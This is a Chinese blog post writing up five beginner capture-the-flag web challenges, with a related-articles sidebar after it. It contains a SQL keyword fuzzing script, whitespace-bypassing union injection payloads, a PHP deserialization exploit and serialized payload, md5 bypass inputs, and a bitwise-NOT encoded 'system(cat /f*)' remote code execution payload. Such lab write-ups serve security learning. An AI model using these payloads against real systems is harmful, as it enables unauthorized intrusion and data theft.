刷题学习记录

已于 2023-11-24 09:22:53 修改
阅读量399 收藏
点赞数
文章标签: 数据库
于 2023-11-23 21:54:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73861475/article/details/134560388
版权

[SWPUCTF 2021 新生赛]sql

进入环境

6351929527e44541b0ab56787e919f20.png

 查看源码,发现是get传参且参数为wllm

b27e345a29f74ad4b736896dd4d65aa3.png

 fuzz测试,发现空格,=,and被过滤了

f7f28ddb7a1d465aa4a593e4bdd15dc9.png

同样的也可以用python脚本进行fuzz测试

import requests
fuzz={'length ','+','handler','like','select','sleep','database','delete','having','or','as','-~','BENCHMARK','limit','left','select','insert'
,'sys.schema_auto_increment_columns','join','right','#','&','&&','\\','handler','---','--','--+','INFORMATION','--',';','!','%','+','xor','<>'
,'(','>','<',')','.','^','=','AND','BY','CAST','COLUMN','COUNT','CREATE','END','case',"'1'='1'",'when',"admin'",'length','+','REVERSE','ascii'
,'select','database','left','right','union','||','oorr','/','//','//*','*/*','/**/','anandd','GROUP','HAVING','IF','INTO','JOIN','LEAVE','LEFT'
,'LEVEL','sleep','LIKE','NAMES','NEXT','NULL','OF','ON','|','infromation_schema','user','OR','ORDER','ORD','SCHEMA','SELECT','SET','TABLE','THEN'
,'UPDATE','USER','USING','VALUE','VALUES','WHEN','WHERE','ADD','AND','prepare','set','update','delete','drop','inset','CAST','COLUMN','CONCAT'
,'GROUP_CONCAT','group_concat','CREATE','DATABASE','DATABASES','alter','DELETE','DROP','floor','rand()','information_schema.tables','TABLE_SCHEMA'
,'%df','concat_ws()','concat','LIMIT','ORD','ON'
,'extractvalue','order','CAST()','by','ORDER','OUTFILE','RENAME','REPLACE','SCHEMA','SELECT','SET','updatexml','SHOW','SQL','TABLE','THEN','TRUE','instr'
,'benchmark','format','bin','substring','ord','UPDATE','VALUES','VARCHAR','VERSION','WHEN','WHERE','/*','`',',','users','%0a','%0b','mid','for','BEFORE','REGEXP'
,'RLIKE','in','sys schemma','SEPARATOR','XOR','CURSOR','FLOOR','sys.schema_table_statistics_with_buffer','INFILE','count','%0c','from','%0d','%a0','=','@','else'}
for i in fuzz:
    res = requests.get('http://node4.anna.nssctf.cn:28876/?wllm={}'.format(i))
    if '请勿非法操作'  in res.text:
        print(i)

 结果也是一样的

既然空格被过滤那就用/**/代替空格,用联合注入进行注入

爆字段

-1'/**/order/**/by/**/4%23(用%23代替#,因为在注入时发现#也没法注入)

118612228ba94a199fe69e0676519ee6.png

爆数据库

-1'/**/union/**/select/**/1,database(),3%23

fce687b81b774c49aaf8fa35405d7024.png

 爆表

-1'union/**/select/**/1,2,group_concat(table_name)/**/from/**/informa
tion_schema.tables/**/where/**/table_schema/**/like/**/'test_db'%23

1c6d2eeff6924c14a0fda0a79f8d0ccb.png

 查询列

-1'union/**/select/**/1,2,group_concat(column_name)/**/from/**/inform
ation_schema.columns/**/where/**/table_schema/**/like/**/'test_db'%23

3451c8fc7d0d4415b12b33bd11da3005.png

查询内容

-1'union/**/select/**/1,2,group_concat(flag)/**/from/**/test_db.LTLT_
flag%23

87ead500c7f0489cb046e712b03e308c.png

 发现flag只有一段,没有全部显示出来,使用截断函数进行绕过,substr,right,REVERSE 被过滤(测试出来的),只能用mid,mid截取,因为回显只能有20个,所以20,一组一组截取

-1'union/**/select/**/1,2,mid(group_concat(flag),20,20)/**/from/**/tes
t_db.LTLT_flag%23

b3171c45772e4e029f08fc4fed5532d5.png

-1%27union/**/select/**/1,2,mid(group_concat(flag),40,20)/**/from/**/test_db.LTLT_flag%23

5afa9ebfeba74969acce602f676d5256.png

最后得到flag

NSSCTF{90c72eb0-e4977-4730-a192-42f3d662c85f}

 [SWPUCTF 2021 新生赛]pop

进入环境得到的是一大串php代码,看到最后的函数发现是反序列化

<?php

error_reporting(0);
show_source("index.php");

class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}

$w00m = $_GET['w00m'];
unserialize($w00m);

?>

查找入口

# 传参$w00m,直接反序列化,入口就在__destruct,或者_wakeup,这里的w22m符合条件 class w22m{ public $w00m; public function __destruct(){ echo $this->w00m; } }

 找链子

# echo一个对象,调用__toString方法,然后调用内部w00m的方法,由此可得链子如下
# w22m.__destruct().w00m->w33m.__toString().w00m->w44m.Getflag()

 构造exp:

<?php

class w44m{

    private $admin = 'w44m';
    protected $passwd = '08067';

}

class w22m{
    public $w00m;
}

class w33m{
    public $w00m;
    public $w22m;

}
# w22m.__destruct().w00m->w33m.__toString().w00m->w44m.Getflag()
$a = new w22m();
$b = new w33m();
$c = new w44m();
# 入口
$a->w00m=$b;
# 链子
$b->w00m=$c;
$b->w22m='Getflag';
echo urlencode(serialize($a));
?>

 找php在线运行工具

e12fcb7a1c7746b1ad21fa6d2db81508.png

得到反序列化代码,但是经过url编码

O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D

 传参得到flag7063673f0a8d48e38aac8100e8bdec48.png

 [BJDCTF 2020]easy_md5

进入环境一开始以为是sql注入,不停在测试sql注入,但是页面都没有什么反应

c1117249584e40cbb2e05d52021b7a73.png

 用bp抓包试一下

010b6f89e931446b8a7ccef1c0f84d44.png

 不难发现在 Response 包中的 Header 中存在
Hint 为:hint: select * from 'admin' where password=md5($pass,true)
我们尝试进行绕过,传入 password=
ffifdyop;即可绕过!原理如下:

05b7e6a0d96b46bb9e86dce6bbbd2f6c.png

 跳转到新页面

a079362a4833490daf4af5622af6eb41.png

 查看源码发现题目代码

78bbb2de92cd4340a97f796134f4ebb3.png

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    header('Location: levell14.php');
-->

 这里要使a,b的md5的值相等才会回显,这里选择用数组绕过md5

7f1f87924ac2408e9f0bbb6b32f01c0b.png

 出现新的页面

 <?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

这里依然选择用数组绕过md5,这里的传参方式为post,最后得到flag

ad5b1ccfa86f43a98fcab1782edad79c.png

 [SWPUCTF 2021 新生赛]hardrce(无字母数字绕过正则表达式总结(含上传临时文件、异或、或、取反、自增脚本)_$code=$_get['code']; eval($code);-CSDN博客)

题目提示直接就是无数字RCE和无字母RCE,上源码

<?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm']))
{
    $wllm = $_GET['wllm'];
    $blacklist = [' ','\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`',];
    foreach ($blacklist as $blackitem)
    {
        if (preg_match('/' . $blackitem . '/m', $wllm)) {
        die("LTLT说不能用这些奇奇怪怪的符号哦!");
    }}
if(preg_match('/[a-zA-Z]/is',$wllm))
{
    die("Ra's Al Ghul说不能用字母哦!");
}
echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
eval($wllm);
}
else
{
    echo "蔡总说:注意审题!!!";
}
?>

 分析源码,可以知道所有字母字符和某些特殊字符被过滤;但源码中可以使用GET方式以wllm为参传值,且源码里面含有eval函数可以执行命令;结合上面要求,可以使用url取反方式进行绕过,不用异或和或运算是因为^和`被过滤了。
使用脚本将system和ls /进行url编码取反

ls=~%93%8C

system=~%8C%86%8C%8B%9A%92

cat /f*=~%9C%9E%8B%DF%D0%99%D5

?wllm=(~%8C%86%8C%8B%9A%92)(~%93%8C);

 不知道为什么system(ls)不能回显,但是system(cat /f*)却能回显出flag

90d8da1ada2e4c34b18924f3682f03ec.png

 [HUBUCTF 2022 新生赛]checkin

进入环境一看到后面的函数就知道是反序列化

<?php
show_source(__FILE__);
$username  = "this_is_secret"; 
$password  = "this_is_not_known_to_you"; 
include("flag.php");//here I changed those two 
$info = isset($_GET['info'])? $_GET['info']: "" ;
$data_unserialize = unserialize($info);
if ($data_unserialize['username']==$username&&$data_unserialize['password']==$password){
    echo $flag;
}else{
    echo "username or password error!";

}

?>

 构造exp:

<?php
$info = array(
	'username'=>true,
	'password'=>true
);
$serialized_data = serialize($info);
echo  $serialized_data ;
?>

 af0c3ae68f0246bc9494afefbe76c586.png

 

得到反序列化代码

a:2:{s:8:"username";b:1;s:8:"password";b:1;}
?info=a:2:{s:8:"username";b:1;s:8:"password";b:1;}

5f6bd4c364184ba9964eb57bb0f6e437.png

 

 

 

 

 

正在努力中的小白♤
关注
字节跳动数据结构刷题学习笔记
Park33的博客
07-27 234
,相信这点大家从目录就可以看出来了!内容览阅下面会直接给大家展示其中部分内容的截图资料。字节跳动的岗位大多数看中的都是算法,所以说在算法部分不在强的小伙伴可以开始刷题了,​这份资料没有别的优点,唯一的优点就是“...
labuladong的算法秘籍+刷题笔记V2.0
09-17
《labuladong的算法秘籍+刷题笔记V2.0》是针对计算机程序员面试和技能提升的一份宝贵资源,特别关注于刷题、算法和数据结构的学习。这套资料包含两部分:《labuladong的刷题笔记V2.0(力扣版).pdf》和《labuladong的...
C++刷题学习笔记目录
日月既往,不可复追
10-10 1408
刷题笔记 为找工作做准备,记录刷题心得与代码 力扣系列目录刷题笔记一、数组【283】移动零二、字符串字符串匹配KMP算法 一、数组 【283】移动零 二、字符串 字符串匹配KMP算法
刷题学习自用笔记
m0_52024881的博客
02-26 248
算法刷题学习笔记
Gemini
03-15 195
算法1.数组 1.数组 二分查找(折半查找) 双指针(快慢指针、相向双指针)
二叉树刷题学习笔记2
@@老胡的博客
04-05 625
上一篇:二叉树刷题学习笔记1——框架 文章目录二叉树的重要性 二叉树的重要性 上一篇章有说到二叉树刷题的两个思路:遍历和分解,而这两个思路,其实就是回溯算法和动态规划的思想。这次我们换一种说法:学过数据结构都知道快速排序和归并排序两种经典的排序算法,实际上,这两种排序的实现思想和框架和二叉树的思想框架大同小异。 ...
名震GitHub,字节跳动内部顶级数据结构刷题学习笔记根本停不下来
python6_quanzhan的博客
11-16 4279
前段时间字节跳动发布了年前再招1万人的消息,从大部分的字节招聘岗位来说的话,Java研发岗位位居榜首! 这个消息一经发布就让大部分的程序员蠢蠢欲动,毕竟字节谁不想去? 字节跳动的岗位大多数看中的都是算法,所以说在算法部分不在强的小伙伴可以开始刷题了,今天给大家带来的就是一份来自字节内部的《排序和数据结构刷题学习笔记》拿他们的剑斩获他们的offfer“不香吗”? 这份资料没有别的优点,唯一的优点就是“全面”相信这点大家从目录就可以看出来了! 内容览阅 下面会直接给大家展示其中部分内容的截图资...
Python刷Leetcode 数据结构与算法学习刷题学习笔记。
Mr_zhouxin123的博客
07-05 1051
Python刷Leetcode 数据结构与算法学习刷题学习笔记。
刷题笔记之深度学习
qq_52057773的博客
06-12 327
每一层输出的特征图(feature map)上的像素点在输入图片上映射的区域大小。再通俗点的解释是,特征图上的一个点对应输入图上的区域。感受野(Receptive Field)的定义是卷积。Lk-1:表示第k-1层的感受野;Fk:表示第k层卷积核的大小;Lk:表示第k层的感受野;Si:表示第i层的步长。
Leetcode 刷题学习笔记
Free_FFF的博客
08-22 235
Leetcode
【力扣刷题学习笔记04(哈希表)】
SAVSORRY的博客
05-20 1586
349. 两个数组的交集 力扣题目链接(opens new window) 题意:给定两个数组,编写一个函数来计算它们的交集。 说明:输出结果中的每个元素一定是唯一的。 我们可以不考虑输出结果的顺序。 使用HashSet的方法 class Solution { public int[] intersection(int[] nums1, int[] nums2) { if (nums1 == null || nums1.length == 0 || nums2
GitHub一战封神,字节跳动内部顶级数据结构刷题学习笔记根本停不下来(csdn)————程序.pdf
12-01
标题和描述中提到的是一份源自字节跳动内部的数据结构刷题学习笔记,这份笔记在GitHub上引起广泛关注,被认为是一份有助于提升编程能力,尤其是对于准备字节跳动面试的程序员极具价值的资源。主要关注点在于各种排序...
代码随想录+刷题笔记记录
03-22
本文主要介绍代码随想录的刷题笔记记录,方便读者更好地利用该网站进行学习。 ## 刷题笔记记录的作用 刷题笔记记录是代码随想录提供的一个功能,用于记录用户在刷题过程中的解题思路和方法。它可以帮助用户更好地...
计算机毕业设计之:基于微信小程序的诗词智能学习系统(源码+文档+解答)
程序员阿龙的博客
09-22 4465
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
Online DDL (Data Definition Language)
09-23 260
是MySQL中的一个功能,允许在修改表结构(如添加、删除或修改列)的同时,允许对表进行并发读写操作。在传统的DDL操作中,对表结构的修改会导致整个表被锁定,从而阻止其他事务对该表进行读写操作,这可能导致长时间的锁定和性能问题。Online DDL的引入解决了这个问题,它允许在修改表结构的同时,保持对表的并发访问。MySQL从5.6版本开始引入了Online DDL的部分功能,而在8.0版本中对Online DDL进行了进一步的优化。
Postgresql特殊关键字
czjnoe的博客
09-25 264
表字段名称如果出现这些特殊关键字,则需要通过单引号访问字段,如offset、group。PostgreSQL特殊关键字。
基于JavaWeb开发的Java+SpringMvc+vue+element实现驾校管理系统详细设计
央顺科技官方博客
09-24 854
机遇与挑战始终并存。在开放的互联网平台面前,驾校预约管理系统的信息管理面临着巨大的挑战。传统的管理模式局限于简单数据的管理,无法适应不断变化的市场格局。在早期阶段,在将计算机技术和网络技术融入驾校预约管理系统数据管理方法之前,所有管理方式都通过人工操作完成了管理信息的。系统管理也都将通过计算机进行整体智能化操作,对于驾校预约管理系统所牵扯的管理及数据保存都是非常多的,举例像所有详细信息包括,管理员;首页、个人中心、学员管理、驾校教练管理、驾校车辆管理、预约管理、取消预约管理、驾校公告管理、系统管理。
Java Alibaba Druid 数据库连接池
miracle的专栏
09-24 725
在Java开发中,数据库连接池是性能优化的重要一环。而作为一款强大的数据库连接池解决方案,凭借其和对多种数据库的支持,成为了许多企业级应用的首选。本篇文章将介绍Druid的核心特性,并结合不同数据库的实际用法。
k8s搭建一主三从的mysql8集群---无坑
最新发布
oopxiajun博客专栏
09-27 487
对于构建基于MySQL的大规模、高性能应用来讲,需要使用水平扩展(集群)的数据库架构方式。在MySQL内建的复制功能可以实现,通过为服务器配置一个或多个备库的方式来进行数据同步。同时复制功能不仅有利于构建高性能的应用,也是高可用性、可扩展性、容灾、备份以及数据仓库等工作的基础。复制的基本原理是让一台服务器的数据与其他服务器保持同步。一台主库的数据可以同步到多台备库上,备库本身也可以被配置成另外一台服务器的主库。主库和备库之间可以有多种不同的组合方式。
labuladong的刷题笔记
09-12
总之,Labuladong的刷题笔记以其思路清晰、逻辑严谨、举例详细和知识点整合等特点,为广大读者提供了一种深入学习和理解算法的有效途径。通过阅读他的刷题笔记并进行实践,读者能够提高解题能力,并在面对各种算法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值